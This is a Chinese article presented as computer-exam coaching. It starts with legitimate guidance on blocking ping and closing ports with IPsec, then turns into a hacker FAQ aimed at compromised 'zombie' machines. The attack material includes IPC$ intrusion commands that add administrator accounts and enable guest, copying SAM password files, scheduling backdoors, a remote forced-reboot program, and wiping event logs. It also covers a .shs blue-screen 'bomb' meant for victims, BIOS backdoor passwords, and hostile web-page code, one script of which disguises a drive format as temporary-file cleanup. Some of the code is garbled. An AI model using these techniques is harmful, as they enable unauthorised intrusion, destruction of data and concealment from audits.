20xx年职称计算机考试辅导：防范被Ping与封闭端口

随着学校校园网越来越多人使用，用户对网络知识认知的提高，很多人在网上下载一些黑客工具或者用Ping命令，进行扫描端口、IP寻找肉机，带来很坏的影响。

Ping命令它可以向你提供的地址发送一个小的数据包，然后侦听这台机器是否有“回答”。查找现在哪些机器在网络上活动。使用Ping入侵即是ICMP 入侵，原理是通过Ping在一个时段内连续向计算机发出大量请求使得计算机的CPU占用率居高不下达到100%而系统死机甚至崩溃。基于此，写这篇IP安全策略防Ping文章以保障自己的系统安全。

其实防Ping安装和设置防火墙也可以解决，但防火墙并不是每一台电脑都会去装，要考虑资源占用还有设置技巧。如果你安装了防火墙但没有去修改、添加IP规则那一样没用。有些配置不是很高为免再给防火墙占用资源用手工在自己系统中设置安全略是一个上上的办法。

下面就写下具体创建过程：

(一)创建IP安全策略

1、依次单击“开始→控制面板→管理工具→本地安全策略”，打开“本地安全设置”，右击该对话框左侧的“IP安全策略，在本地计算机”选项，执行“创建IP安全策略”命令。(之间有些简单的点击下一步之类的过程省略不写)

2、在出现的“默认响应规则身份验证方法”对话框中我们选中“此字符串用来保护密钥交换(预共享密钥)”选项，然后在下面的文字框中任意键入一段字符串。(如“禁止 Ping”)

3、完成了IP安全策略的创建工作后在“IP筛选器列表”窗口中单击“添加”按钮，此时将会弹出“IP筛选器向导”窗口，我们单击“下一步”，此时将会弹出“IP通信源”页面，在该页面中设置“源地址”为“我的IP地址”：“目标地址”为“任何IP地址”，任何IP地址的计算机都不能Ping你的机器。

在“筛选器属性”中可封闭端口。比如封闭TCP协议的135端口：在“选择协议类型”的下拉列表中选择“TCP”，然后在“到此端口”下的文本框中输入“135”，点击“确定”按钮，这样就添加了一个屏蔽 TCP 135(RPC)端口的筛选器，它可以防止外界通过135端口连上你的电脑。重复可封闭TCP UDP等自己认为需要封闭的端口。这里不一一写出。

4、依次单击“下一步”→“完成”，此时，你将会在“IP筛选器列表”看到刚刚创建的筛选器，将其选中后单击“下一步”，我们在出现的“筛选器操作”页面中设置筛选器操作为“需要安全”选项。

(二)指派IP安全策略

安全策略创建完毕后并不能马上生效，我们还需通过“指派”功能令其发挥作用。方法是：在“控制台根节点”中右击“新的IP安全策略”项，然后在弹出的右键菜单中执行“指派”命令，即可启用该策略。

至此，这台主机已经具备了拒绝其他任何机器Ping自己IP地址的功能，不过在本地仍然能够Ping通自己。经过这样的设置之后，所有用户(包括管理员)都不能在其他机器上对此服务器进行Ping操作。从此你再也不用担心被Ping威胁。如果再把一些黑客工具、木马常探寻的端口封闭那你的系统就更加固若金汤了。

Ping的工作过程及单向Ping通的原因

当网络出现问题时，我们最常用的测试工具就是“Ping”命令了。但有时候我们会碰到单方向Ping通的现象，例如通过HUB或一根交叉线连接的在同一个局域网内的电脑A、 B，在检查它们之间的网络连通性时，发现从主机A Ping 主机B正常而从主机B Ping 主机A时，出现“超时无应答”错误。为什么呢?

要知道这其中的奥秘，我们有必要来看看Ping命令的工作过程到底是怎么样的。 假定主机A的IP地址是192.168.1.1，主机B的IP地址是192.168.1.2，都在同一子网内，则当你在主机A上运行“Ping 192.168.1.2”后，都发生了些什么呢?

首先，Ping命令会构建一个固定格式的ICMP请求数据包，然后由ICMP协议将这个数据包连同地址“192.168.1.2”一起交给IP层协议(和ICMP一样，实际上是一组后台运行的进程)，IP层协议将以地址“192.168.1.2”作为目的地址，本机IP地址作为源地址，加上一些其他的控制信息，构建一个IP数据包，并在一个映射表中查找出IP地址192.168.1.2所对应的物理地址(也叫MAC地址，熟悉网卡配置的朋友不会陌生，这是数据链路层协议构建数据链路层的传输单元——帧所必需的)，一并交给数据链路层。后者构建一个数据帧，目的地址是IP层传过来的物理地址，源地址则是本机的物理地址，还要附加上一些控制信息，依据以太网的介质访问规则，将它们传送出去。

主机B收到这个数据帧后，先检查它的目的地址，并和本机的物理地址对比，如符合，则接收;否则丢弃。接收后检查该数据帧，将IP数据包从帧中提取出来，交给本机的IP层协议。同样，IP层检查后，将有用的信息提取后交给ICMP协议，后者处理后，马上构建一个ICMP应答包，发送给主机A，其过程和主机A发送ICMP请求包到主机B一模一样。

从Ping的工作过程，我们可以知道，主机A收到了主机B的一个应答包，说明两台主机之间的去、回通路均正常。也就是说，无论从主机A到主机B，还是从主机B到主机A，都是正常的。那么，是什么原因引起只能单方向Ping通的呢?

一、安装了个人防火墙

在共享上网的机器中，出于安全考虑，大部分作为服务器的主机都安装了个人防火墙软件，而其他作为客户机的机器则一般不安装。几乎所有的个人防火墙软件，默认情况下是不允许其他机器Ping本机的。一般的做法是将来自外部的ICMP请求报文滤掉，但它却对本机出去的ICMP请求报文，以及来自外部的ICMP应答报文不加任何限制。这样，从本机Ping

其他机器时，如果网络正常，就没有问题。但如果从其他机器Ping这台机器，即使网络一切正常，也会出现“超时无应答”的错误。

大部分的单方向Ping通现象源于此。解决的办法也很简单，根据你自己所用的不同类型的防火墙，调整相应的设置即可。

二、错误设置IP地址

正常情况下，一台主机应该有一个网卡，一个IP地址，或多个网卡，多个IP地址(这些地址一定要处于不同的IP子网)。但对于在公共场所使用的电脑，特别是网吧，人多手杂，其中不泛有“探索者”。曾有一次两台电脑也出现了这种单方向Ping通的情况，经过仔细检查，发现其中一台电脑的“拨号网络适配器”(相当于一块软网卡)的TCP/IP设置中，设置了一个与网卡IP地址处于同一子网的IP地址，这样，在IP层协议看来，这台主机就有两个不同的接口处于同一网段内。当从这台主机Ping其他的机器时，会存在这样的问题:

(1)主机不知道将数据包发到哪个网络接口，因为有两个网络接口都连接在同一网段;

(2)主机不知道用哪个地址作为数据包的源地址。因此，从这台主机去Ping其他机器，IP层协议会无法处理，超时后，Ping 就会给出一个“超时无应答”的错误信息提示。但从其他主机Ping这台主机时，请求包从特定的网卡来，ICMP只须简单地将目的、源地址互换，并更改一些标志即可，ICMP应答包能顺利发出，其他主机也就能成功Ping通这台机器了。

第二篇：查看计算机端口

1） 如何查看本机所开端口： 用netstat -a —n命令查看！再state下面有一些英文，我来简单说一下这些英文具体都代表什么 LISTEN：侦听来自远方的TCP端口的连接请求 SYN-SENT：再发送连接请求后等待匹配的连接请求 SYN-RECEIVED：再收到和发送一个连接请求后等待对方对连接请求的确认 ESTABLISHED：代表一个打开的连接 FIN-WAIT-1：等待远程TCP连接中断请求，或先前的连接中断请求的确认 FIN-WAIT-2：从远程TCP等待连接中断请求 CLOSE-WAIT：等待从本地用户发来的连接中断请求 CLOSING：等待远程TCP对连接中断的确认 LAST-ACK：等待原来的发向远程TCP的连接中断请求的确认 TIME-WAIT：等待足够的时间以确保远程TCP接收到连接中断请求的确认 CLOSED：没有任何连接状态 2）如何获得一个IP地址的主机名？ 利用ping -a ip 命令查看！再第一行的pinging后面的 『ip』前面的英文就是对方主机名！ 同样道理，利用ping machine_name也可以得到对方的ip 获得一个网站的ip地址的方法是：ping www.***.com 比如想知道sohu的ip，就用ping /来查看就可以了 顺便说一句：如果返回：Reply from *.*.*.*: TTL expired in transit的话，呵呵，代表TTL（生命周期）在传输过程中过期 什么意思呢？我来解释一下！ 导致这个问题出现的原因有两个：1）TTL值太小！TTL值小于你和对方主机之间经过的路由器数目。 2）路由器数量太多，经过路由器的数量大于TTL值！ 呵呵，其实这两点是一个意思！只不过说法不同而已！ 3）如何查看本机的ip地址？ 用ipconfig来查看就可以！ 也可以再Windows中的开始菜单，运行中输入winipcfg，同样可以看到自己的ip ipconfig命令后面如果加一个参数 /all的话，可以得到更加详细的资料，比如DNS、网关等?? 4）再使用net命令的时候遇到一些错误代码，如何查看对应的错误信息？ 用命令 net helpmsg erorr_code来查看就可以了 比如错误代码为：88 则查看命令为：net helpmsg 88 下面有这个错误代码的中文显示！ 5）利用telnet连接到对方主机上，想获得一些系统信息，用什么命令？ set命令可以很好的完成你所需要收集信息的任务的！ 方法：再cmd下直接输入set（telnet对方主机以后，也是直接set就可以了～然后能够得到NNNNN多的

信息） 再这里，computername：呵呵，还用说么？主机名！ OS＝Windows_NT ：操作系统的类型哦～ path＝C:\perl\bin\ ：（perl的解释器位置！） systemDrive=c: 操作系统盘符！ USERNAME=coldcrysky 当前登陆使用机器的用户 ?? （6）跟踪路由器的命令是什么？ tracert 格式：tracert ip 中间会列出所有经过的路由器列表！这些路由器如果是暴露再防火墙外面的话，还可以看到路由的IP哦～呵呵（这里又涉及到了另外一个问题：为什么要把路由放在防火墙后面？原因呢，主要有两点：1）保护路由器！因为现在越来越多的攻击和入侵已经开始瞄准路由器了～如果直接把路由暴露在外面，呵呵，是非常危险的！被DoS了就不好了啊～呵呵，所以要放在防火墙里面；2）为路由器减少负担！如果所有的过滤功能统统都压在路由器上面，呵呵，路由器的负担就太大了！） 当然，利用pathping也可以达到同样效果！格式与tracert一样！ 7）简单介绍一下cookie！ cookie，又名小甜点。 它的作用：记录访问者的一些信息。例如利用cookie记录你所登陆这个网页的次数、登陆时曾经输入的信息?? 最常见的是，大家再登陆论坛（邮箱）的时候，经常在输入第一个字母的时候，往往下面就显示出了所有在本机登陆过该论坛（邮箱）的用户名吧？呵呵，这个就是cookie的作用！ 大家在Administrator的cookies目录中可以看到很多的记事本文档吧？这些都是cookie，虽然经过了加密，但是仔细查找的话，仍然能够看到一些敏感信息！况且现在也已经有了专门查看cookie的软件！利用这些软件，你的隐私将不保哦～ 那么，如何清除cookie呢？一般情况下，可以在Internet选项中的常规选项卡中看到一个删除cookies的按钮，点击就可以清楚掉了～ 除此以外，还要在internet选项中的内容选项卡中找到自动完成按钮，把里面的四项都选中！然后点击清除表单，清除密码～ 然后到操作系统目录所在的分区中！进入Winnt（98为windows）目录（当然了，这些都是默认的目录！如果你安装的时候改名了，就对应的去相应目录）之后找到Temporary Internet Files目录（2000的目录在c:\Documents and settings\administrator\Local settings\Temporary Internet Files）98直接到windows目录下找Temporary Internet Files就可以了～，找到这个文件夹后，打开！看到里面有NNNNNNNNNNNN多的文件了么？呵呵，这些是你浏览过的网页的记录（有的时候从网站上面看到漂亮的FLASH，可是不能保存怎么办？只要在线浏览一遍以后，断线到这里来找*.swf，之后依次打开查看的话，相信你会找到你所需要的FLASH的！），好了，跑题了～继续说：这些文件是网站的页面记录，直接删除就可以了！ 另外，有没有彻底禁止cookie的方法呢？ 呵呵，当然有了！在IE的Internet选项中，找到隐私选项卡！，把里面的滑块拖到最上面，边上写着：阻止所有cookie，呵呵，是不是？ 另外一种方法：找到Windows目录下的cookies目录！把里面的txt文件全部删除！，最后应该只剩下一个index.dat文件！之后把这个文件夹设置成只读就可以了～ 不过，禁止cookie后，大部分的论坛都无法正常登陆了啊！呵呵，到底禁止不禁止就看你自己的了～ 8）安装2000的时候，速度会特别特别特别慢，怎么加快安装速度呢？ 在DOS上面安装，应该用98启动光盘来引导系统！然后按照下面的方法来做，可以提高安装速度： g:\>cd windows -------假设G为光驱 windows为98的安装目录！ g:\windows>smartdrv -------加载smartdrv程序！加载后没有任何提示信息！只要不返回错误信息就是

加载成功了～这时候安装2K的话，速度会很快的哦～ 9）Windows2K密码忘记了，如何才能进入系统？ Windows2K的用户配置信息和密码保存在SAM文件里！该文件位于：c:\winnt\system32\config目录中！只要删除这个文件就可以了～ 另外，在c:\winnt\repair目录中也同样有一个SAM文件（这个是前者的备份！）如果你在登陆肉鸡的时候，copy前面那个目录中的SAM文件，你会发现COPY不下来！呵呵，为什么？因为运行着的2K系统会保护SAM文件啊～这个时候你就COPY这个就可以了！ 10)ping不到，tracert不到，但是却能用nbtstat显示对方的一些信息，为什么？ 因为tracert和ping命令使用的是ICMP协议！而nbtstat是通过对方的netbios端口来获得对方的主机信息的！使用的是UDP和TCP协议！如果对方仅仅只对ICMP协议做了禁止的话，那通过这个命令获得系统信息是正常的！ 11）telnet上去后，如何给对方开共享？ 开共享的命令如下：net share c=c:\winnt\system 返回共享成功 之后直接利用\\ip\c来访问对方的system目录了～删除共享用 share c /del 命令就可以了 12）如何判断对方的具体操作系统版本？ 首先用ver命令查看对方的版本号！ 如果是5.00.2195的话，为2K；5.1.2600为XP 从这里可以区分出来到底是2K还是XP了～下面进行更加具体的区分！ 2K的pro和svr版本区分： 在telnet下，net shart查看启动的服务～如果对方开启了Terminal Services服务的话，基本上可以判断为svr以上的版本了～如果没有开启，则为pro！（具体方法有三种，因为前几天在论坛中我回复过暗界了～所以这里就不再重复了～） XP的pro和home版的区分： home edition是无法安装iis的！所以，可以通过iis服务来判断到底是home版或者是pro了～ 当然了，如果对方是pro，但是将iis删除（停用）的话，就没办法判断了～呵呵 13）如何查看98的随机启动的程序？ 在98下有一个实用配置程序（msconfig），中文名为：系统配置实用程序，调用的方法是在：开始--运行中输入msconfig，在里面，有一个启动的选项卡，点击后，可以看到很多随即启动程序，如果前面带有钩的话，就是启动时随机启动的，取消的话就是把前面的小钩去掉就可以了～（如果在这里查看到了一些未知的启动文件--比如没有文件的具体路径，或者没有文件名的话，最好取消它的自启动！因为很有可能是木马！） 除了这里以外，还有config.sys、autoexec.bat、system.ini、win.ini几个选项卡，他们分别对应这几个文件！只不过在这里更方便查看而已！ 14）设置了BIOS密码，可是却忘记了，该怎么办？ 如果是可以进入Windows的话，可以找找biospwds和cmospwd这两个软件看看～ 还有利用DEBUG法： 简单介绍两种：

1）-o 70 16 -o 71 13 -q退出 2）-o 70 16 -o 71 16 -q 另一种方法：copy法： copy con cmos.com 输入下面10个字符：alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格，然后按下F6并回车，退出，运行这个cmos.com程序就可以了～ 恩，如果不能进入Windows怎么办呢？ 简单介绍两种方法： 1）用通用密码： Award Bios密码：j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589 AMI bios密码：AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I. 这是常见的密码，不妨试试～ 如果不行的话，可以利用CMOS放电： 就是把主板上的电池取下来，等一会儿再插上去～ 15）如何自制一个让98蓝屏的炸弹？ 恩，这个是前几天QQ上面朋友问我的问题，整理的时候突然间想起来了，就写一下好了～ 首先，打开Word，再插入菜单中选择对象，这时，弹出对象包装程序窗口，再这个窗口中，点击导入，随便找一个文本或者程序就可以！之后点：编辑菜单。这里选择命令行，出现一个命令行窗口，在里面协商c:\con\con，点击保存，完成后，再点编辑包中的复制包，把他随便到一个地方复制下来，之后看到的是一个名位片断的东西！给这个文件起一个名字，呵呵，传给那个可怜的家伙吧，等待他蓝屏，掉线！ （这个命令行中可以插入很多的命令，不见得非要用这个98蓝屏漏洞哦～）顺便说一下：这个已经不是什么新鲜的技术了，这个技术的名字叫做：碎片对象。呵呵，碎片？记忆碎片么？不是的！他的后缀是：.shs！之所以说一下这个，是因为有的朋友还不知道～做一个整理而已！不知道的朋友看过后就知道了，知道的朋友就权当复习了～另外，不要利用这个方法做破坏！否则后果自负！ 16）如何再命令行下杀死对方进程？ 利用微软的2K以上操作系统都是含有这个工具的！该工具包含在2K光盘的\support\tools文件夹下！里面有安装程序，点击后，就安装了2K的support tools工具包，里面有kill这个工具，这时候再cmd下可以输入kill/?，就可以看到帮助了，使用这个命令的格式是：kill pid （pid是进程的ID号！）再任务管理器中可以看到进程的ID号！（不知道有几位朋友用过蓝色火焰？呵呵，用法跟这个一摸一样！还有很多类似的木马、后门软件都有类似的功能！这个是windows自带的大木马『后门工具』而已！） 这时候，有朋友问了，那再命令行下如何查看进程呢？呵呵，这就用到了系统自带的有一个后门工具了：再刚才说得那个目录中，还有一个工具叫tlist 看名字就能看出来是干什么的吧？用法更简单！直接输入tlist就可以得到pid遇队形程序的列表了～ 那对方机器如果没有安装这两个程序怎么办呢？没关系，你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文件上传到对方的winnt\system32目录中就可以了！呵呵～ 17）上次说了ping的基本用法，这次谈谈ping的命令参数！ 这个是本次问题集的重点部分！无论是小鸟还是老鸟，你们能保证你真的对这些参数了如指掌么？恐怕都未必！还是好好看看吧！ 这是TCP／IP协议中最有用的命令之一 它给另一个系统发送一系列的数据包，该系统本身又发回一个响应，这条实用程序对查找远程主机很有用，

它返回的结果表示是否能到达主机，宿主机发送一个返回数据包需要多长时间。 Usage： ping 〔-t〕 〔-a〕 〔-n count〕 〔-l size〕 〔-f〕 〔-i TTL〕 〔-v TOS〕 〔-r count〕 〔-s count〕 〔〔-j host-list〕 〔-k host-list〕〕 〔-w timeout〕 destination-list Options： -t Ping the specifed host until interrupted.（除非人为中止，否则一直ping下去） -a Resolve addresses to hostnames.（把IP转为主机名） -n count Number of echo requests to send.（响应请求的数量） -l size Send buffer size.（封包的大小） -f Set Don`t Fragment flag in packet.（信息包中无碎片） -i TTL Time To Live.（时间） -v TOS Type Of Service.（服务类型） -r count Record route for count hops. -s count Timestamp for count hops. -j host-list Loose source route along host-list. -k host-list Strict source route along host-list.（较严格的??唉，怎么译好??算了，放着吧） -w timeout Timeout in milliseconds to wait for each reply.（timeout的时间） 比如大家可能都知道的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令（当然这样只会造成我方自己的网络阻塞）。 其实这个命令主要是用来看对方应答的速度，如果怎么ping 得到的结果都是request time out。那恐怕你根本就不用你去找这台主机了，它不在你的射程之内。 18）如何查看本机的DNS服务器？ ipconfig其实是可以的（呵呵，上次就介绍过这个命令），除此以外，还可以利用一个命令：再cmd下输入netsh，进入到netsh>提示符，再输入：int ip 进入到interface ip> 然后再次输入dump，这时候屏幕上出现当前连接的配置情况了 这里必须介绍一下netsh到底是作什么用的！这个命令比较复杂，他包含了很多的子命令，所以这里只对部分命令进行讲解： 1）查看本机IP：首先键入netsh，再netsh>提示符下输入：interface 回车 之后：ip 回车 再之后：show address 回车 这样，就可以看到当前连接的IP地址和子网掩码。（其实这个命令不如ipconfig简单，也不如ipconfig/all全面） 2）修改网络配置：接着上面的命令，我们使用：set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0，这样就修改了当前的IP地址，用show address来看看（或者用ipconfig） 3）显示一个完整的网络配置教本： 刚才说过，第一个命令显示的信息不如ipconfig/all全面，不用着急，netsh再打印显示网络配置上，还是有自己的特色的！例如：再interface ip>状态下输入：dump，会显示一个清单，显示所有本地连接（不管你是否使用～）与netstat -an不完全一样！ 这就是netsh的简单介绍和最基础的用法！希望大家能够掌握！还可以输入？来查看帮助！（要在netsh>提示符下才能查看帮助啊～） 19）肉鸡上的部分文件无法删除，怎么办？ 如果对方的文件夹是只读的话，会出现拒绝访问的字样！这时候，我们可以再del命令后面加上/f参数来删除！

20）再说一个可以限制用户登陆时间的命令！ 再net命令中就可以实现这样的功能！具体方法如下： 假如我们打算让：coldcrysky这个用户再周日到周易的上午八点到下午四点之间可以登陆，用这个命令： net user coldcrysky /timesunday-monday,08:00-16:00 之后利用net user coldcrysky命令来查看登陆时间的限制，可以看到是我们所规定的时间（因为是中文的，很容易懂，我就不多废话了） 在此，特别提醒各位：命令中：星期日才是一周的开始！！！不要当成星期一！ 光说了怎么设置，如果想恢复回去怎么办呢？（就是恢复成默认状态，任何时间都可以登陆的状态） 看我的：net user coldcrysky /time:all --这样就可以了～ 22)如何删除windows2K的默认贡献？ 首先打开记事本，输入如下内容： net share c$ /delete net share d$ /delete net share e$ /delete net share f$ /delete net share g$ /delete net share ipc$ /delete net share admin$ /delete 这里的c$、d$、e$??是代表默认共享的盘符～又几个就设置几个就可以了～ 之后点击保存成批处理文件（后缀为：bat的文件！）！加入到启动组中就可以了～ 23）139端口的又一用法 呵呵，写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着??先声明两点：1）不要利用本帖所提到的方法去搞恶意破坏！2）呵呵，可能许多人已经知道了139端口这个用法了～本文只想起到一个抛砖引玉的作用！ 废话不多说了～开始： 如果你使用NT主机的话，那你可要注意了！ 重启NT主机的方法如下： 1：Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username" 建立一个IPC连接 2：net use H: \\XXX.XXX.XXX.XXX\C$ 将对方的C盘映射为自己的h盘 3：copy c on h:\reboot.bat Iisreset /reboot CTRL+Z 在对方的C盘上生成一个能重启机器的文件 4：net time \\XXX.XXX.XXX.XXX 得到对方机器时间 5：at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat 设定对方重启的时间！ 6：at \\XXX.XXX.XXX.XXX 查看任务上面是否添加了这个任务 7：等对方重启好了～ 上面的第三步是only for Win2K的，如果是Nt，就需要用意个指定的重启程序，我们可以自己编写一个reboot.exe来代替reboot.bat，代码如下： #include "stdio.h" #include "windows.h"

int main() { 文件://定义重启的时候发送给所有用户的消息 LPSTR msg="Reboot Tool By LionHook\n";; 文件://尝试用最简单的API函数重启 if(ExitWindowXXX(EWX_REBOOT.0))return TRUE; if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE; 文件://因为上面的重启不成功，所以需要调整本进程的特权 HANDLE hToken; TOKEN_PRIVILEGES tkp; if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE; 文件://获取重启的特权 SE_SHUTDOWN_NAME LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); tkp.PrivilegeCount=1; tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0); 文件://判断是NT内核还是9X内核，选择用不同的方式 if(!GetVersion()& 0x80000000)) InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE); else if (!ExitWindowXXX(EWX_REBOOT,0)) if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0)) return FALSE; return TRUE; 对了，再次说明啊，别用本文提到的方法搞破坏，小心警察叔叔打PP～呵呵 24）利用批处理文件来建立一个记录3389登陆者信息的记录器 由于Terminal Service默认是没有日志记录的，只能依靠他的系统日志，但是系统日志只能记录一些大动作（开启或停止服务），那么，如何用批处理文件来编写一个将是3389端口的程序呢？很简单： 建立一个批处理文件：内容如下： @echo off date/t >> c:\3389log.txt :TS3389 time/t >> c:\3389log.txt netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt goto :TS3389 之后保存！ 如果有人用你的3389登陆你的机器，呵呵，在c盘下就有3389log.txt这个文件！记录了当天日志，还有连接时间??资料～开始反击～呵呵 25）网络命令小节 A、NET命令： IPC连接：格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接～』 net use \\对方IP\ipc$ /delete 『断开连接～』 以下操作需要在连接到对方主机后才可进行！！！ net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』 net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提高啊！！！^_^』 net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符！』 net start telnet 『开启TELNET』 net user guest /active:yes 『激活GUEST』 net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』 B、AT命令： 查看远程机时间：net time \\对方IP 加入一项新任务：

at \\对方IP 时间 文件名 『用来把自己上传的后门程序在制定时间运行，方便以后进入肉鸡！』 C、TELNET命令： telnet 对方IP 端口 『作用不用我说了吧？？？』 D、FTP命令： 登陆：ftp 对方网址（IP地址） 上传文件：get 文件在本机完整路径 对方文件存放完整路径 下载文件：put 对方文件完整路径 本机存放文件路径 E、COPY命令： 在建立连接后（尤其是IPC$连接后，很有用的命令哦～） ⑴copy index.htm \\127.0.0.1\c$\index.htm 『将本机index.htm文件复制到127.0.0.1的C盘下，如果要放到对方的NT目录下，则把C改为admin$』 ⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文件拷贝到本机C盘根目录下』F、SET命令： 主要用于分析目标计算机的基本信息用！具体使用方法请查找相关文件！ G、NBTSTAT命令： nbtstat -A 对方IP （这个A大写） 『在其中显示<037>前面的英文或数字就是计算机名称！当然，也可以利用PING -A 对方ip的方法来查看对方主机名！效果相同！！！』 H、SHUTDOWN命令： 『用来关闭对方NT服务的命令』格式如下： shutdown \\IP地址 t:20 『20秒后自动关闭对方NT服务！由于对对方机器影响较大，慎用！！！』 I、DIR命令： 还用我说么？大家是不是早就该掌握了？？？（不知道的还是查阅相关资料吧～～～） J、ECHO命令： echo coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』 echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』 K、ATTRIB命令： 更改文件属性用，格式： Attrib -r index.htm 『去掉只读属性』（＋- 分别代表增加和减少） L、DEL命令： 『删除日志的时候用！』 del c:\winnt\system32\logfiles\*.* del c:\winnt\system32\config\*.evt del c:\winnt\system32\dtclog\*.* del c:\winnt\system32\*.log del c:\winnt\system32\*.txt del c:\winnt\*.txt del c:\winnt\*.log M、PING命令： -t ：ping制定IP，知道网络断开或按CTRL+C结束！ -a ：解释PING IP的主机名 -n count ：发送count指定的ECHO数据包，默认为4个！ 26）这里我必须（或者说不得不重新重申一个命令！不过说之前我要把这个命令的相关命令稍微介绍一下！）

我要说的命令就是：开启服务和停止服务的net start and net stop 这两个命令大多数朋友已经很熟悉了吧？不过为了方便更多的菜鸟能看明白我要说的意思，不用再看其他相关文章，所以我简单说两句：net start是开启服务！那么，如何开启呢？比如，我们这里要开启telnet服务，那就直接再2K的cmd下输入：net start telnet就OK了～关闭一项服务的话，把start换成stop就OK了～不过这里必须要注意：你所关闭的服务必须是已经开启的服务！！！好像是一句废话 OK，有了这个前提后，下面就继续介绍：那么，net start和net stop到底能开启什么服务？其实这点也不需要你强记，记住这个命令就可以了：net help start和net help stop，这两个会显示出你所能开启的服务有那些~~ 这里比如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”，那么当这个命令使用net start和net stop的时候，你必须在这项服务上面加上“”，原因是因为这个服务名称中带有空格！如果服务名称中不带空格，你可以不用带这个引号！！！这点是我强调的问题！大家一定不要忘记了！『前些天看到S8S8.net的黑白新区中有人说net start 和 net stop后面的服务名必须带空格是错误的！明白原因了吧？』 27）关于双系统的两个问题： A、如何在双系统（98、2000）中安全删除2K？ 先制作一张Windows 98 的启动软盘，再用它启动你的计算机，运行sys命令恢复Windows 98引导记录后，再运行fdisk/mbr恢复主引导记录，完成后进入Windows 98，把winnt 和system volumn information 目录删除，再删掉C盘上的boot.ini、bootfont.bin、ntldr、nydetect.com、bootsect.dos文件就行了。 B、 Windows 98/XP双系统启动菜单修复 1.修复前，在BIOS中设置从光驱启动。用Windows XP安装盘启动电脑，在加载必要的驱动后，出现Windows XP的安装界面。有三个选项： （1）要现在开始安装Windows XP，请按“Enter”键。 （2）要用“恢复控制台”修复Windows XP安装，按“R”键。 （3）要退出安装程序，不安装Windows XP，按“F3”键； 2. 按“R”键，进入“Microsoft Windows XP (TM) 故障恢复控制台”界面；故障恢复控制台提供系统修复和故障恢复功能。系统这时会搜寻已安装的Windows XP系统文件，然后显示搜寻结果，并询问“要登录到哪个Windows XP安装（要取消，请按Enter）”，选择1. D:\Windows，回车，系统会再询问“管理员密码”，再键入安装Windows XP时设置的管理员密码，回车，出现D:\Windows〉，这时需要输入修复命令Fixboot，后面的参数为启动扇区要写入的磁盘盘符，这里填入C:，回车。修复完成，键入Exit退出。重启后就会看到久违的双重启动菜单了。并且，这样修复后基本不产生垃圾文件。 因为这两个问题是非常非常普遍的，所以我就收集到这里了～ 28）这里说几个主页恶意代码：『并不是让大家把这些代码加入到自己的主页中！只是希望大家能了解恶意代码，起到更好的防护作用！』 A、死循环代码： 『把下列代码加入到网页中，可达到如上效果』 <img src=javascript.. :location=“网页的文件名.htm:”> 说明：当含有这段代码的网页被人点击，连接就会不断的打开IE浏览器，直到你的系统资源浪费到0％～只有重新启动才能正常使用！ 预防方法：禁用所有的ActiveX控件和插件！因为这是一个ActiveX教本程序～ B、恐怖的大图片： 『把下列代码加入到网页中，可达到如上效果』 <img src= "http://恐怖图片的连接地址" width= "1" height= "100000000000000000000000"> 说明：当打开这样的网页，IE会不断的解释试图打开，但由于图片实在太大，超出了其处理能力，所以?? C、地震死机代码： 『把下列代码加入到网页中，可达到如上效果』 <script..> if (window.top.moveBy){ for (i = 1;i < 50; i++){ for (j = 3;j > 0; j--){ window.top.moveBy(0,i);

window.top.moveBy(i,0); window.top.moveBy(0,-i*2); window.top.moveBy(-i*2,0); window.top.moveBy(0,i); window.top.moveBy(i,0); } } } </script..> <img src="c:\con\con"> 说明：<img src="c:\con\con">是windows9x的设备名称解析漏洞！ WINDOWS9x的\con\con设备名称解析漏洞允许用户进行攻击，倒是98死机。原理：我们知道，CON是DOS下的特殊设备名，不允许做文件名，如果我们在DOS下键入如下命令：copy coldcrysky.txt con，系统会显示coldcrysky.txt的内容，如果换成：copy coldcrysky.txt>con系统会提示文件不能拷贝到文件自身。如果吧con换成LPT或PRN，则输出coldcrysky.txt到打印机。由此可见，CON代表文件本身，如果使用\CON\CON命令，则意味着系统不断调用文件本身，视系统资源迅速枯竭，连按CTRL+ALT+DEL的机会都没有～ 解决办法： 对于9X系统，强烈建议打补丁！！！2000和XP则不会死机～ D、格式化硬盘：（最恐怖的～～～慎用！！！请勿用于非法用途！！！使用后如果有任何负作用，后果自负！与伤寒天空『ColdCrySky』；乱刀留影无关！！！） scr,Reset(); scr.Path="C:\\WINDOWS\\StartMenu\\Programs\\启动\\startup.htm"; scr.Doc="<object id=`wsh` classid=`clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B`>" WSH.rUN(`start/m format.com d:/q/autotest/u`); alert(`IMPORTANT : Windows is removing unused temporary files.`); scr.write(); 